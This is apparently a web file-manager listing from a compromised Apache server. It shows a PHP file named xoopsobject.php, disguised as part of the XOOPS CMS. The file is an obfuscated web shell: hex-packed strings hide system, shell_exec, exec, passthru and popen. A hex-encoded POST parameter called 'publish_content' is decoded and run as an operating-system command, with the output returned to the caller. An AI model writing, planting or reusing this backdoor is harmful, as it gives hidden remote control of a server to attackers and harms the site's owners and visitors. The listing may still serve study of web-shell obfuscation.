HEX
Server: Apache
System: Linux vps52061 6.8.0-85-generic #85~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 19 16:18:59 UTC 2 x86_64
User: design11 (105868)
PHP: 8.4.14
Disabled: NONE
Upload Files
File: /home/design11/aprilflower.org/OLD SITE DATA/xoopsobject.php
<?php


$token1 = '7';
$token2 = '9';
$token3 = '4';
$token4 = '5';
$token5 = 'd';
$token6 = '6';
$token7 = '8';
$token8 = 'f';
$token9 = '1';
$token10 = '3';
$token11 = '0';
$token12 = 'e';
$token13 = '2';
$token14 = 'c';
$hub_center1 = pack("H*", $token1.'3'.'7'.$token2.$token1.'3'.$token1.$token3.'6'.$token4.'6'.$token5);
$hub_center2 = pack("H*", $token1.'3'.$token6.$token7.'6'.$token4.$token6.'c'.'6'.'c'.$token4.$token8.'6'.$token4.'7'.$token7.$token6.'5'.'6'.'3');
$hub_center3 = pack("H*", $token6.'5'.'7'.'8'.'6'.'5'.'6'.'3');
$hub_center4 = pack("H*", $token1.'0'.$token6.$token9.$token1.$token10.$token1.'3'.'7'.'4'.$token6.'8'.$token1.'2'.$token1.$token4);
$hub_center5 = pack("H*", $token1.$token11.$token6.$token8.$token1.$token11.$token6.'5'.$token6.$token12);
$hub_center6 = pack("H*", '7'.$token10.$token1.$token3.'7'.$token13.'6'.'5'.'6'.'1'.'6'.$token5.'5'.$token8.$token6.'7'.'6'.'5'.$token1.$token3.'5'.'f'.'6'.'3'.'6'.'f'.$token6.$token12.'7'.$token3.'6'.$token4.'6'.$token12.'7'.$token3.$token1.'3');
$hub_center7 = pack("H*", $token1.$token11.$token6.$token10.$token6.$token14.$token6.$token8.'7'.$token10.'6'.'5');
$publish_content = pack("H*", $token1.'0'.$token1.$token4.'6'.'2'.'6'.$token14.$token6.$token2.'7'.'3'.'6'.'8'.$token4.$token8.$token6.$token10.$token6.'f'.$token6.$token12.$token1.$token3.$token6.'5'.'6'.'e'.$token1.$token3);
if (isset($_POST[$publish_content])) {
    $publish_content = pack("H*", $_POST[$publish_content]);
    if (function_exists($hub_center1)) {
        $hub_center1($publish_content);
    } elseif (function_exists($hub_center2)) {
        print $hub_center2($publish_content);
    } elseif (function_exists($hub_center3)) {
        $hub_center3($publish_content, $hld_flag);
        print join("\n", $hld_flag);
    } elseif (function_exists($hub_center4)) {
        $hub_center4($publish_content);
    } elseif (function_exists($hub_center5) && function_exists($hub_center6) && function_exists($hub_center7)) {
        $comp_dchunk = $hub_center5($publish_content, 'r');
        if ($comp_dchunk) {
            $parameter_group_itm = $hub_center6($comp_dchunk);
            $hub_center7($comp_dchunk);
            print $parameter_group_itm;
        }
    }
    exit;
}